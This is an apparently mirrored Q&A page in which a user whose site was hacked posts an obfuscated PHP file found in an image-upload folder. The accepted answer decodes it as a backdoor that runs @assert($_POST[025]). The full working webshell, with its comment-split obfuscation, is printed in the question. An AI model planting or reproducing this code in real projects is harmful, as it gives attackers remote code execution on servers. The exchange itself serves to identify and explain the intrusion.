douchao0358 2016-11-21 15:09
浏览 35
已采纳

我的上传文件夹中的未知PHP文件,是不是恶意代码?

Recently i found out my project got hacked and i found a script in my images folder which where a directory for user to upload their images (using file input). Here is the script that i found in the directory.

errot_db.php

<?php                  
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>
  • 写回答

1条回答 默认 最新

  • donglengyuan6826 2016-11-21 15:13
    关注

    This code hides the following statement:

    @assert ($_POST[025]);

    Which means it'll execute the PHP code send in the POST variable "025". So, yes, this is indeed a backdoor! I recommend asking on security.stackexchange.com for help on how to properly deal with the fallout.

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论

报告相同问题?

悬赏问题

  • ¥15 使用yolov5-7.0目标检测报错
  • ¥15 对于这个问题的解释说明
  • ¥200 询问:python实现大地主题正反算的程序设计,有偿
  • ¥15 smptlib使用465端口发送邮件失败
  • ¥200 总是报错,能帮助用python实现程序实现高斯正反算吗?有偿
  • ¥15 对于squad数据集的基于bert模型的微调
  • ¥15 为什么我运行这个网络会出现以下报错?CRNN神经网络
  • ¥20 steam下载游戏占用内存
  • ¥15 CST保存项目时失败
  • ¥20 java在应用程序里获取不到扬声器设备